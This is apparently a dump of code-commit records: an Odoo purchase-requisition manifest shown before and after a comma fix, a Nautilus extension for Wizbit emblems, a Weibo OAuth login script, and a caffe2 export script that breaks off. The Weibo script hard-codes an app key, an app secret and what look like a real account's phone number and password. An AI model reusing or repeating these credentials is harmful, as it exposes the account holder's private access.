o,mvaled/OpenUpgrade,feroda/odoo,oihane/odoo,agrista/odoo-saas,alexcuellar/odoo,Codefans-fan/odoo,ujjwalwahi/odoo,gavin-feng/odoo,tvibliani/odoo,chiragjogi/odoo,sinbazhou/odoo,Drooids/odoo,ccomb/OpenUpgrade,klunwebale/odoo,oihane/odoo,jiachenning/odoo,OpenUpgrade-dev/OpenUpgrade,erkrishna9/odoo,hubsaysnuaa/odoo,vnsofthe/odoo,datenbetrieb/odoo,savoirfairelinux/OpenUpgrade,jeasoft/odoo,Ichag/odoo,storm-computers/odoo,fdvarela/odoo8,JCA-Developpement/Odoo,aviciimaxwell/odoo,CubicERP/odoo,draugiskisprendimai/odoo,lsinfo/odoo,bobisme/odoo,juanalfonsopr/odoo,alhashash/odoo,bobisme/odoo,ehirt/odoo,florian-dacosta/OpenUpgrade,alexcuellar/odoo,minhtuancn/odoo,NL66278/OCB,Ernesto99/odoo,abenzbiria/clients_odoo,wangjun/odoo,nuncjo/odoo,steedos/odoo,patmcb/odoo,jolevq/odoopub,CatsAndDogsbvba/odoo,Endika/OpenUpgrade,damdam-s/OpenUpgrade,kybriainfotech/iSocioCRM,nuuuboo/odoo,ingadhoc/odoo,MarcosCommunity/odoo,sergio-incaser/odoo,javierTerry/odoo,windedge/odoo,srimai/odoo,sve-odoo/odoo,goliveirab/odoo,ThinkOpen-Solutions/odoo,fjbatresv/odoo,hbrunn/OpenUpgrade,grap/OpenUpgrade,sergio-incaser/odoo,ygol/odoo,minhtuancn/odoo,patmcb/odoo,nagyistoce/odoo-dev-odoo,papouso/odoo,hassoon3/odoo,Bachaco-ve/odoo,0k/odoo,Nick-OpusVL/odoo,cedk/odoo,FlorianLudwig/odoo,jesramirez/odoo,cdrooom/odoo,damdam-s/OpenUpgrade,BT-ojossen/odoo,laslabs/odoo,hbrunn/OpenUpgrade,OpusVL/odoo,mustafat/odoo-1,NeovaHealth/odoo,ramadhane/odoo,ecosoft-odoo/odoo,bealdav/OpenUpgrade,lgscofield/odoo,kirca/OpenUpgrade,colinnewell/odoo,addition-it-solutions/project-all,Eric-Zhong/odoo,SerpentCS/odoo,dkubiak789/odoo,doomsterinc/odoo,doomsterinc/odoo,dalegregory/odoo,tarzan0820/odoo,takis/odoo,rahuldhote/odoo,klunwebale/odoo,mlaitinen/odoo,Nick-OpusVL/odoo,ChanduERP/odoo,ramadhane/odoo,xzYue/odoo,sv-dev1/odoo,tinkerthaler/odoo,collex100/odoo,SerpentCS/odoo,cloud9UG/odoo,oasiswork/odoo,nuuuboo/odoo,jolevq/odoopub,BT-fgarbely/odoo,ihsanudin/odoo,MarcosCommunity/odoo,nhomar/odoo,sergio-incaser/odoo,hanicker/odoo,KontorConsulting/odoo,cpyou/odoo,klunwebale/odoo,0k/OpenUpgrade,savoirfairelinux/OpenUpgrade,savoirfairelinux/odoo,gorjuce/odoo,BT-astauder/odoo,RafaelTorrealba/odoo,microcom/odoo,0k/odoo,savoirfairelinux/odoo,mustafat/odoo-1,FlorianLudwig/odoo,rdeheele/odoo,jaxkodex/odoo,tinkerthaler/odoo,pedrobaeza/odoo,chiragjogi/odoo,poljeff/odoo,wangjun/odoo,tvtsoft/odoo8,simongoffin/website_version,simongoffin/website_version,jfpla/odoo,guewen/OpenUpgrade,BT-rmartin/odoo,apanju/GMIO_Odoo,sergio-incaser/odoo,tinkhaven-organization/odoo,jolevq/odoopub,kybriainfotech/iSocioCRM,takis/odoo,x111ong/odoo,eino-makitalo/odoo,ygol/odoo,Drooids/odoo,fuselock/odoo,apocalypsebg/odoo,janocat/odoo,virgree/odoo,guewen/OpenUpgrade,funkring/fdoo,datenbetrieb/odoo,cpyou/odoo,FlorianLudwig/odoo,ThinkOpen-Solutions/odoo,oliverhr/odoo,Endika/odoo,ecosoft-odoo/odoo,rahuldhote/odoo,blaggacao/OpenUpgrade,colinnewell/odoo,hoatle/odoo,dezynetechnologies/odoo,gavin-feng/odoo,MarcosCommunity/odoo,rowemoore/odoo,Bachaco-ve/odoo,cedk/odoo,leorochael/odoo,shivam1111/odoo,ClearCorp-dev/odoo,leoliujie/odoo,avoinsystems/odoo,rgeleta/odoo,hip-odoo/odoo,cedk/odoo,gvb/odoo,luiseduardohdbackup/odoo,nitinitprof/odoo,naousse/odoo,dfang/odoo,0k/OpenUpgrade,avoinsystems/odoo,dgzurita/odoo,rubencabrera/odoo,andreparames/odoo,hopeall/odoo,Maspear/odoo,mvaled/OpenUpgrade,JGarcia-Panach/odoo,JGarcia-Panach/odoo,BT-fgarbely/odoo,x111ong/odoo,oliverhr/odoo,bplancher/odoo,brijeshkesariya/odoo,omprakasha/odoo,sinbazhou/odoo,dgzurita/odoo,matrixise/odoo,slevenhagen/odoo-npg,ojengwa/odoo,oasiswork/odoo,colinnewell/odoo,omprakasha/odoo,elmerdpadilla/iv,alqfahad/odoo,Nick-OpusVL/odoo,alexcuellar/odoo,fuselock/odoo,Adel-Magebinary/odoo,doomsterinc/odoo,ShineFan/odoo,AuyaJackie/odoo,srsman/odoo,CopeX/odoo,lsinfo/odoo,ygol/odoo,juanalfonsopr/odoo,fuselock/odoo,gsmartway/odoo,spadae22/odoo,idncom/odoo,hifly/OpenUpgrade,mustafat/odoo-1,Danisan/odoo-1,ecosoft-odoo/odoo,chiragjogi/odoo,addition-it-solutions/project-all,thanhacun/odoo,goliveirab/odoo,leoliujie/odoo,draugiskisprendimai/odoo,glovebx/odoo,TRESCLOUD/odoopub,PongPi/isl-odoo,addition-it-solutions/project-all,tvibliani/odoo,fevxie/odoo,nitinitprof/odoo,leorochael/odoo,brijeshkesariya/odoo,poljeff/odoo,deKupini/erp,Bachaco-ve/odoo,fevxie/odoo,kybriainfotech/iSocioCRM,joariasl/odoo,laslabs/odoo,laslabs/odoo,aviciimaxwell/odoo,patmcb/odoo,bguillot/OpenUpgrade,Grirrane/odoo,jaxkodex/odoo,0k/OpenUpgrade,janocat/odoo,apanju/GMIO_Odoo,virgree/odoo,rgeleta/odoo,cdrooom/odoo,pedrobaeza/OpenUpgrade,mvaled/OpenUpgrade,dgzurita/odoo,leoliujie/odoo,gavin-feng/odoo,javierTerry/odoo,storm-computers/odoo,apanju/odoo,ChanduERP/odoo,dalegregory/odoo,collex100/odoo,guerrerocarlos/odoo,Drooids/odoo,Bachaco-ve/odoo,poljeff/odoo,tvtsoft/odoo8,Drooids/odoo,abstract-open-solutions/OCB,fuselock/odoo,vnsofthe/odoo,dgzurita/odoo,cdrooom/odoo,Kilhog/odoo,lightcn/odoo,osvalr/odoo,guerrerocarlos/odoo,stephen144/odoo,shaufi/odoo,Codefans-fan/odoo,waytai/odoo,VielSoft/odoo,VielSoft/odoo,ygol/odoo,JonathanStein/odoo,Elico-Corp/odoo_OCB,bakhtout/odoo-educ,nuncjo/odoo,bplancher/odoo,lgscofield/odoo,pedrobaeza/odoo,MarcosCommunity/odoo,leoliujie/odoo,nitinitprof/odoo,virgree/odoo,nexiles/odoo,tangyiyong/odoo,inspyration/odoo,hanicker/odoo,syci/OCB,csrocha/OpenUpgrade,virgree/odoo,Nick-OpusVL/odoo,pplatek/odoo,eino-makitalo/odoo,dsfsdgsbngfggb/odoo,mvaled/OpenUpgrade,ovnicraft/odoo,microcom/odoo,pedrobaeza/odoo,bakhtout/odoo-educ,rowemoore/odoo,osvalr/odoo,hopeall/odoo,ChanduERP/odoo,n0m4dz/odoo,guerrerocarlos/odoo,ApuliaSoftware/odoo,kifcaliph/odoo,ramadhane/odoo,sysadminmatmoz/OCB,factorlibre/OCB,slevenhagen/odoo-npg,florentx/OpenUpgrade,optima-ict/odoo,Daniel-CA/odoo,apocalypsebg/odoo,x111ong/odoo,salaria/odoo,incaser/odoo-odoo,odoo-turkiye/odoo,bplancher/odoo,hifly/OpenUpgrade,apanju/odoo,spadae22/odoo,odoo-turkiye/odoo,waytai/odoo,xujb/odoo,draugiskisprendimai/odoo,minhtuancn/odoo,fuhongliang/odoo,xujb/odoo,virgree/odoo,acshan/odoo,funkring/fdoo,havt/odoo,jpshort/odoo,addition-it-solutions/project-all,SAM-IT-SA/odoo,janocat/odoo,Adel-Magebinary/odoo,Endika/odoo,rgeleta/odoo,apanju/odoo,dezynetechnologies/odoo,mlaitinen/odoo,JCA-Developpement/Odoo,fuhongliang/odoo,OpenUpgrade/OpenUpgrade,Adel-Magebinary/odoo,agrista/odoo-saas,stonegithubs/odoo,lsinfo/odoo,janocat/odoo,tangyiyong/odoo,Antiun/odoo,OpenUpgrade-dev/OpenUpgrade,TRESCLOUD/odoopub,ehirt/odoo,glovebx/odoo,sysadminmatmoz/OCB,dllsf/odootest,zchking/odoo,shaufi/odoo,xujb/odoo,BT-ojossen/odoo,ApuliaSoftware/odoo,diagramsoftware/odoo,tarzan0820/odoo,javierTerry/odoo,slevenhagen/odoo,hifly/OpenUpgrade,slevenhagen/odoo,Danisan/odoo-1,nagyistoce/odoo-dev-odoo,Adel-Magebinary/odoo,sebalix/OpenUpgrade,agrista/odoo-saas,sadleader/odoo,ujjwalwahi/odoo,ubic135/odoo-design,hubsaysnuaa/odoo,GauravSahu/odoo,Antiun/odoo,dfang/odoo,shaufi10/odoo,Elico-Corp/odoo_OCB,CubicERP/odoo,salaria/odoo,Antiun/odoo,Eric-Zhong/odoo,Gitlab11/odoo,hubsaysnuaa/odoo,Kilhog/odoo,bobisme/odoo,Gitlab11/odoo,Gitlab11/odoo,tvibliani/odoo,Grirrane/odoo,naousse/odoo,Nowheresly/odoo,nagyistoce/odoo-dev-odoo,fgesora/odoo,idncom/odoo,highco-groupe/odoo,alexteodor/odoo,fuselock/odoo,Daniel-CA/odoo,sve-odoo/odoo,kittiu/odoo,GauravSahu/odoo,diagramsoftware/odoo,jeasoft/odoo,ovnicraft/odoo,kittiu/odoo,laslabs/odoo,fdvarela/odoo8,hoatle/odoo,odoousers2014/odoo,BT-ojossen/odoo,ramitalat/odoo,lgscofield/odoo,srimai/odoo,tangyiyong/odoo,BT-rmartin/odoo,simongoffin/website_version,Ernesto99/odoo,Ichag/odoo,sve-odoo/odoo,charbeljc/OCB,mustafat/odoo-1,gorjuce/odoo,ubic135/odoo-design,ihsanudin/odoo,hoatle/odoo,fuhongliang/odoo,apanju/GMIO_Odoo,ramadhane/odoo,erkrishna9/odoo,mszewczy/odoo,salaria/odoo,brijeshkesariya/odoo,abenzbiria/clients_odoo,Noviat/odoo,bealdav/OpenUpgrade,cloud9UG/odoo,GauravSahu/odoo,thanhacun/odoo,Kilhog/odoo,AuyaJackie/odoo,shivam1111/odoo,makinacorpus/odoo,hanicker/odoo,mkieszek/odoo,hopeall/odoo,Codefans-fan/odoo,bplancher/odoo,synconics/odoo,shaufi10/odoo,jusdng/odoo,ujjwalwahi/odoo,shaufi/odoo,ramitalat/odoo,oliverhr/odoo,fossoult/odoo,sv-dev1/odoo,shaufi10/odoo,nitinitprof/odoo,apanju/odoo,leorochael/odoo,eino-makitalo/odoo,CatsAndDogsbvba/odoo,KontorConsulting/odoo,leorochael/odoo,steedos/odoo,pedrobaeza/OpenUpgrade,OpenUpgrade-dev/OpenUpgrade,joshuajan/odoo,provaleks/o8,guerrerocarlos/odoo,rowemoore/odoo,RafaelTorrealba/odoo,nagyistoce/odoo-dev-odoo,grap/OpenUpgrade,ramitalat/odoo,FlorianLudwig/odoo,acshan/odoo,Endika/odoo,makinacorpus/odoo,cloud9UG/odoo,tinkerthaler/odoo,NeovaHealth/odoo,markeTIC/OCB,fuhongliang/odoo,odoo-turkiye/odoo,erkrishna9/odoo,zchking/odoo,Danisan/odoo-1,jfpla/odoo,gavin-feng/odoo,Endika/OpenUpgrade,spadae22/odoo,naousse/odoo,odoousers2014/odoo,cpyou/odoo,bobisme/odoo,microcom/odoo,hopeall/odoo,JGarcia-Panach/odoo,charbeljc/OCB,JonathanStein/odoo,ClearCorp-dev/odoo,SerpentCS/odoo,GauravSahu/odoo,demon-ru/iml-crm,jiangzhixiao/odoo,tvtsoft/odoo8,jeasoft/odoo,hanicker/odoo,doomsterinc/odoo,patmcb/odoo,BT-astauder/odoo,fuhongliang/odoo,ingadhoc/odoo,cysnake4713/odoo,savoirfairelinux/OpenUpgrade,guewen/OpenUpgrade,fuselock/odoo,elmerdpadilla/iv,ApuliaSoftware/odoo,incaser/odoo-odoo,factorlibre/OCB,luistorresm/odoo,Gitlab11/odoo,rgeleta/odoo,charbeljc/OCB,zchking/odoo,ramadhane/odoo,hassoon3/odoo,nhomar/odoo,rahuldhote/odoo,nuncjo/odoo,charbeljc/OCB,luiseduardohdbackup/odoo,rdeheele/odoo,csrocha/OpenUpgrade,ShineFan/odoo,andreparames/odoo,thanhacun/odoo,salaria/odoo,eino-makitalo/odoo,Kilhog/odoo,ecosoft-odoo/odoo,optima-ict/odoo,srsman/odoo,goliveirab/odoo,0k/OpenUpgrade,Endika/odoo,joshuajan/odoo,markeTIC/OCB,shaufi/odoo,markeTIC/OCB,SAM-IT-SA/odoo,cloud9UG/odoo,Drooids/odoo,inspyration/odoo,omprakasha/odoo,dsfsdgsbngfggb/odoo,vnsofthe/odoo,jpshort/odoo,bealdav/OpenUpgrade,dllsf/odootest,hifly/OpenUpgrade,Nowheresly/odoo,Kilhog/odoo,luiseduardohdbackup/odoo,FlorianLudwig/odoo,apocalypsebg/odoo,blaggacao/OpenUpgrade,hubsaysnuaa/odoo,sysadminmatmoz/OCB,gsmartway/odoo,tinkhaven-organization/odoo,dgzurita/odoo,GauravSahu/odoo,JCA-Developpement/Odoo,kybriainfotech/iSocioCRM,odootr/odoo,ujjwalwahi/odoo,oliverhr/odoo,bplancher/odoo,aviciimaxwell/odoo,shingonoide/odoo,jolevq/odoopub,hanicker/odoo,highco-groupe/odoo,luistorresm/odoo,Nowheresly/odoo,kittiu/odoo,Noviat/odoo,hassoon3/odoo,ingadhoc/odoo,OpenUpgrade/OpenUpgrade,Antiun/odoo,Adel-Magebinary/odoo,dariemp/odoo,nexiles/odoo,mkieszek/odoo,QianBIG/odoo,NL66278/OCB,ramadhane/odoo,bguillot/OpenUpgrade,mszewczy/odoo,hip-odoo/odoo,spadae22/odoo,abenzbiria/clients_odoo,BT-ojossen/odoo,Maspear/odoo,provaleks/o8,Noviat/odoo,glovebx/odoo,prospwro/odoo,abdellatifkarroum/odoo,pedrobaeza/OpenUpgrade,joshuajan/odoo,ubic135/odoo-design,jpshort/odoo,zchking/odoo,diagramsoftware/odoo,datenbetrieb/odoo,savoirfairelinux/odoo,tinkhaven-organization/odoo,joariasl/odoo,jpshort/odoo,numerigraphe/odoo,dariemp/odoo,diagramsoftware/odoo,sadleader/odoo,cloud9UG/odoo,collex100/odoo,gsmartway/odoo,laslabs/odoo,factorlibre/OCB,abenzbiria/clients_odoo,Ichag/odoo,bguillot/OpenUpgrade,sebalix/OpenUpgrade,ChanduERP/odoo,dezynetechnologies/odoo,hassoon3/odoo,hassoon3/odoo,Elico-Corp/odoo_OCB,realsaiko/odoo,tinkerthaler/odoo,dkubiak789/odoo,sysadminmatmoz/OCB,abdellatifkarroum/odoo,bkirui/odoo,bguillot/OpenUpgrade,optima-ict/odoo,hbrunn/OpenUpgrade,KontorConsulting/odoo,ccomb/OpenUpgrade,minhtuancn/odoo,shingonoide/odoo,Maspear/odoo,KontorConsulting/odoo,Ichag/odoo,SerpentCS/odoo,steedos/odoo,dkubiak789/odoo,rubencabrera/odoo,Grirrane/odoo,hopeall/odoo,nhomar/odoo-mirror,goliveirab/odoo,arthru/OpenUpgrade,0k/odoo,NL66278/OCB,storm-computers/odoo,fgesora/odoo,fossoult/odoo,hmen89/odoo,apanju/odoo,ramitalat/odoo,charbeljc/OCB,datenbetrieb/odoo,shaufi10/odoo,Endika/OpenUpgrade,guewen/OpenUpgrade,shivam1111/odoo,PongPi/isl-odoo,sadleader/odoo,ihsanudin/odoo,stephen144/odoo,odoo-turkiye/odoo,kittiu/odoo,slevenhagen/odoo-npg,jusdng/odoo,gorjuce/odoo,dsfsdgsbngfggb/odoo,omprakasha/odoo,SerpentCS/odoo,takis/odoo,fjbatresv/odoo,luiseduardohdbackup/odoo,erkrishna9/odoo,fjbatresv/odoo,xzYue/odoo,srimai/odoo,matrixise/odoo,mmbtba/odoo,VielSoft/odoo,numerigraphe/odoo,Nowheresly/odoo,mszewczy/odoo,blaggacao/OpenUpgrade,mvaled/OpenUpgrade,odoo-turkiye/odoo,waytai/odoo,stonegithubs/odoo,erkrishna9/odoo,Bachaco-ve/odoo,syci/OCB,srsman/odoo,Daniel-CA/odoo,JonathanStein/odoo,funkring/fdoo,dsfsdgsbngfggb/odoo,kirca/OpenUpgrade,optima-ict/odoo,luiseduardohdbackup/odoo,jeasoft/odoo,laslabs/odoo,fdvarela/odoo8,provaleks/o8,deKupini/erp,stonegithubs/odoo,ShineFan/odoo,ovnicraft/odoo,markeTIC/OCB,jusdng/odoo,hopeall/odoo,QianBIG/odoo,Maspear/odoo,arthru/OpenUpgrade,waytai/odoo,kifcaliph/odoo,demon-ru/iml-crm,odoo-turkiye/odoo,AuyaJackie/odoo,CopeX/odoo,apocalypsebg/odoo,feroda/odoo,hip-odoo/odoo,dariemp/odoo,pplatek/odoo,dfang/odoo,Codefans-fan/odoo,nhomar/odoo-mirror,alhashash/odoo,avoinsystems/odoo,bguillot/OpenUpgrade,havt/odoo,Nick-OpusVL/odoo,CatsAndDogsbvba/odoo,rowemoore/odoo,demon-ru/iml-crm,dfang/odoo,jeasoft/odoo,jpshort/odoo,odoousers2014/odoo,Adel-Magebinary/odoo,alexcuellar/odoo,slevenhagen/odoo-npg,hbrunn/OpenUpgrade,hbrunn/OpenUpgrade,cpyou/odoo,QianBIG/odoo,jpshort/odoo,cdrooom/odoo,x111ong/odoo,stephen144/odoo,nagyistoce/odoo-dev-odoo,shingonoide/odoo,ehirt/odoo,SerpentCS/odoo,OpenUpgrade-dev/OpenUpgrade,nuncjo/odoo,bealdav/OpenUpgrade,takis/odoo,fgesora/odoo,rubencabrera/odoo,guewen/OpenUpgrade,Codefans-fan/odoo,CubicERP/odoo,massot/odoo,funkring/fdoo,BT-rmartin/odoo,guewen/OpenUpgrade,OpenUpgrade/OpenUpgrade,andreparames/odoo,dsfsdgsbngfggb/odoo,spadae22/odoo,dariemp/odoo,xzYue/odoo,elmerdpadilla/iv,minhtuancn/odoo,guerrerocarlos/odoo,makinacorpus/odoo,SAM-IT-SA/odoo,JCA-Developpement/Odoo,abdellatifkarroum/odoo,sv-dev1/odoo,tarzan0820/odoo,RafaelTorrealba/odoo,hubsaysnuaa/odoo,andreparames/odoo,pplatek/odoo,bakhtout/odoo-educ,thanhacun/odoo,pedrobaeza/OpenUpgrade,stephen144/odoo,Noviat/odoo,grap/OpenUpgrade,draugiskisprendimai/odoo,colinnewell/odoo,klunwebale/odoo,florentx/OpenUpgrade,VielSoft/odoo,rubencabrera/odoo,nitinitprof/odoo,alqfahad/odoo,hubsaysnuaa/odoo,arthru/OpenUpgrade,sebalix/OpenUpgrade,CubicERP/odoo,alhashash/odoo,ihsanudin/odoo,tvtsoft/odoo8,grap/OpenUpgrade,waytai/odoo,ramitalat/odoo,FlorianLudwig/odoo,Maspear/odoo,hoatle/odoo,Maspear/odoo,pedrobaeza/odoo,CatsAndDogsbvba/odoo,papouso/odoo,sv-dev1/odoo,pplatek/odoo,dezynetechnologies/odoo,BT-rmartin/odoo,gsmartway/odoo,virgree/odoo,windedge/odoo,cysnake4713/odoo,feroda/odoo,grap/OpenUpgrade,SAM-IT-SA/odoo,Maspear/odoo,hassoon3/odoo,jolevq/odoopub,charbeljc/OCB,pplatek/odoo,osvalr/odoo,fuhongliang/odoo,AuyaJackie/odoo,dariemp/odoo,bealdav/OpenUpgrade,klunwebale/odoo,kittiu/odoo,realsaiko/odoo,ramitalat/odoo,xzYue/odoo,ClearCorp-dev/odoo,nuuuboo/odoo,acshan/odoo,jfpla/odoo,avoinsystems/odoo,Daniel-CA/odoo,mmbtba/odoo,lombritz/odoo,ygol/odoo,makinacorpus/odoo,ApuliaSoftware/odoo,jusdng/odoo,ThinkOpen-Solutions/odoo,tinkerthaler/odoo,abenzbiria/clients_odoo,naousse/odoo,alqfahad/odoo,rowemoore/odoo,Antiun/odoo,oihane/odoo,Nowheresly/odoo,vnsofthe/odoo,savoirfairelinux/OpenUpgrade,slevenhagen/odoo-npg,jaxkodex/odoo,steedos/odoo,csrocha/OpenUpgrade,luiseduardohdbackup/odoo,eino-makitalo/odoo,ubic135/odoo-design,incaser/odoo-odoo,andreparames/odoo,Elico-Corp/odoo_OCB,odootr/odoo,MarcosCommunity/odoo,savoirfairelinux/OpenUpgrade,shingonoide/odoo,wangjun/odoo,fossoult/odoo,damdam-s/OpenUpgrade,takis/odoo,factorlibre/OCB,fevxie/odoo,bguillot/OpenUpgrade,joariasl/odoo,lgscofield/odoo,incaser/odoo-odoo,shaufi/odoo,Ichag/odoo,pedrobaeza/odoo,JGarcia-Panach/odoo,rahuldhote/odoo,salaria/odoo,apocalypsebg/odoo,RafaelTorrealba/odoo,dgzurita/odoo,gvb/odoo,nuncjo/odoo,microcom/odoo,bkirui/odoo,acshan/odoo,Endika/odoo,juanalfonsopr/odoo,ovnicraft/odoo,tvibliani/odoo,hanicker/odoo,synconics/odoo,kybriainfotech/iSocioCRM,srimai/odoo,dezynetechnologies/odoo,kybriainfotech/iSocioCRM,BT-fgarbely/odoo,jesramirez/odoo,ShineFan/odoo,slevenhagen/odoo,lightcn/odoo,syci/OCB,draugiskisprendimai/odoo,oasiswork/odoo,csrocha/OpenUpgrade,havt/odoo,fuselock/odoo,shaufi/odoo,hmen89/odoo,sergio-incaser/odoo,Noviat/odoo,rahuldhote/odoo,synconics/odoo,makinacorpus/odoo,shingonoide/odoo,rahuldhote/odoo,sebalix/OpenUpgrade,cysnake4713/odoo,alqfahad/odoo,Daniel-CA/odoo,Danisan/odoo-1,stephen144/odoo,Eric-Zhong/odoo,bwrsandman/OpenUpgrade,funkring/fdoo,tarzan0820/odoo,nuncjo/odoo,zchking/odoo,jiachenning/odoo,jeasoft/odoo,cloud9UG/odoo,deKupini/erp,odooindia/odoo,abstract-open-solutions/OCB,Noviat/odoo,abstract-open-solutions/OCB,pedrobaeza/odoo,florian-dacosta/OpenUpgrade | addons/purchase_requisition/__openerp__.py | addons/purchase_requisition/__openerp__.py | ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Purchase Requisitions',
'version': '0.1',
'author': 'OpenERP SA',
'category': 'Purchase Management',
'images': ['images/purchase_requisitions.jpeg'],
'website': 'http://www.openerp.com',
'description': """
This module allows you to manage your Purchase Requisition.
===========================================================
When a purchase order is created, you now have the opportunity to save the
related requisition. This new object will regroup and will allow you to easily
keep track and order all your purchase orders.
""",
'depends' : ['purchase'],
'js': [
'static/src/js/web_addons.js',
],
'demo': ['purchase_requisition_demo.xml'],
'data': ['security/purchase_tender.xml',
'wizard/purchase_requisition_partner_view.xml',
'wizard/bid_line_qty_view.xml',
'purchase_requisition_data.xml',
'purchase_requisition_view.xml',
'purchase_requisition_report.xml',
'purchase_requisition_workflow.xml',
'security/ir.model.access.csv','purchase_requisition_sequence.xml',
'views/report_purchaserequisition.xml',
],
'auto_install': False,
'test': [
'test/purchase_requisition_users.yml',
'test/purchase_requisition_demo.yml',
'test/cancel_purchase_requisition.yml',
'test/purchase_requisition.yml',
],
'installable': True,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Purchase Requisitions',
'version': '0.1',
'author': 'OpenERP SA',
'category': 'Purchase Management',
'images': ['images/purchase_requisitions.jpeg'],
'website': 'http://www.openerp.com',
'description': """
This module allows you to manage your Purchase Requisition.
===========================================================
When a purchase order is created, you now have the opportunity to save the
related requisition. This new object will regroup and will allow you to easily
keep track and order all your purchase orders.
""",
'depends' : ['purchase'],
'js': [
'static/src/js/web_addons.js',
],
'demo': ['purchase_requisition_demo.xml'],
'data': ['security/purchase_tender.xml',
'wizard/purchase_requisition_partner_view.xml',
'wizard/bid_line_qty_view.xml',
'purchase_requisition_data.xml',
'purchase_requisition_view.xml',
'purchase_requisition_report.xml',
'purchase_requisition_workflow.xml',
'security/ir.model.access.csv','purchase_requisition_sequence.xml'
'views/report_purchaserequisition.xml',
],
'auto_install': False,
'test': [
'test/purchase_requisition_users.yml',
'test/purchase_requisition_demo.yml',
'test/cancel_purchase_requisition.yml',
'test/purchase_requisition.yml',
],
'installable': True,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | Python |
72738366fa074b457021faab0c21c3b89070b5ad | Add first revision of Nautilus extension. | wizbit-archive/wizbit,wizbit-archive/wizbit | nautilus/wizbit-extension.py | nautilus/wizbit-extension.py | from urlparse import urlparse
from os.path import exists, split, isdir
import nautilus
from lxml import etree
WIZ_CONTROLLED = "wiz-controlled"
WIZ_CONFLICT = "wiz-conflict"
YES = "Yes"
NO = "No"
class WizbitExtension(nautilus.ColumnProvider, nautilus.InfoProvider):
def __init__(self):
pass
def get_columns(self):
return [nautilus.Column("NautilusWizbit::is_controlled",
WIZ_CONTROLLED,
"Wizbit Controlled",
"File may be syncronized by Wizbit"),
nautilus.Column("NautilusWizbit::has_conflict",
WIZ_CONFLICT,
"Wizbit Conflict",
"File may have multiple versions that need to be resolved")]
def update_file_info(self, file):
controlled = False
conflict = False
(scheme, netloc, path, params, query, fragment) = urlparse(file.get_uri())
if scheme != 'file':
return
wizpath = self.get_wizpath(path)
if wizpath:
if isdir(path):
controlled = True
else:
try:
repos = etree.parse (wizpath + "/.wizbit/repos")
except IOError:
pass
else:
#Find if file is controlled
files = [f.text for f in repos.getroot().xpath("/wizbit/repo/file")]
(path, filename) = split(path)
if filename in files:
controlled = True
#Find if file is conflicting
repel = repos.getroot().xpath("/wizbit/repo")
for r in repel:
if r.get("name") == filename + ".git":
heads = [h for h in r if h.tag == "head"]
if len(heads) > 1:
conflict = True
if controlled:
file.add_emblem("cvs-controlled")
file.add_string_attribute(WIZ_CONTROLLED, YES)
else:
file.add_string_attribute(WIZ_CONTROLLED, NO)
if conflict:
file.add_emblem("cvs-conflict")
file.add_string_attribute(WIZ_CONFLICT, YES)
else:
file.add_string_attribute(WIZ_CONFLICT, NO)
def get_wizpath(self, path):
if exists(path + "/.wizbit/repos"):
return path
else:
(head, tail) = split(path)
if head != '/':
return self.get_wizpath(head)
else:
if exists("/.wizbit/repos"):
return head
else:
return ""
| lgpl-2.1 | Python |
|
2a9858381a78bd9ff9ff459a23f73630237e6669 | send vm | Heipiao/weibo,Heipiao/weibo | weibo_data_input.py | weibo_data_input.py | __author__ = 'heipiao'
# -*- coding: utf-8 -*-
from weibo import APIClient
import urllib2
import urllib
#APP_KEY和APP_SECRET,需要新建一个微博应用才能得到
APP_KEY = '3722673574'
APP_SECRET = '7a6de53498caf87e655a98fa2f8912bf'
#管理中心---应用信息---高级信息,将"授权回调页"的值改成https://api.weibo.com/oauth2/default.html
CALLBACK_URL = 'https://api.weibo.com/oauth2/default.html'
AUTH_URL = 'https://api.weibo.com/oauth2/authorize'
def GetCode(userid,passwd):
client = APIClient(app_key = APP_KEY, app_secret=APP_SECRET, redirect_uri=CALLBACK_URL)
referer_url = client.get_authorize_url()
postdata = {
"action": "login",
"client_id": APP_KEY,
"redirect_uri":CALLBACK_URL,
"userId": userid,
"passwd": passwd,
}
headers = {
"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0",
"Referer":referer_url,
"Connection":"keep-alive"
}
req = urllib2.Request(
url = AUTH_URL,
data = urllib.urlencode(postdata),
headers = headers
)
resp = urllib2.urlopen(req)
return resp.geturl()[-32:]
if __name__ == "__main__":
print GetCode("15029357121","liu8315") | mit | Python |
|
7b899fbcf7a661758ab2a9cdca7ade6c461c8e65 | add c model | Oscarlight/PiNN_Caffe2,Oscarlight/PiNN_Caffe2,Oscarlight/PiNN_Caffe2,Oscarlight/PiNN_Caffe2 | transiNXOR_modeling/caffe2_tensor_to_c_array.py | transiNXOR_modeling/caffe2_tensor_to_c_array.py | import sys
sys.path.append('../')
import caffe2_paths
from caffe2.python import workspace
from pinn import exporter
from scipy.io import savemat
import numpy as np
import pickle
model_name = 'bise_h216_0'
init_net = exporter.load_init_net('./transiXOR_Models/'+model_name+'_init')
print(type(init_net))
with open("c_model/c_arrays.txt","w") as f:
for op in init_net.op:
tensor = workspace.FetchBlob(op.output[0])
tensor_name = op.output[0].replace('/', '_')
print(tensor_name)
print(tensor.shape)
tensor_str = np.array2string(tensor.flatten(), separator=',')
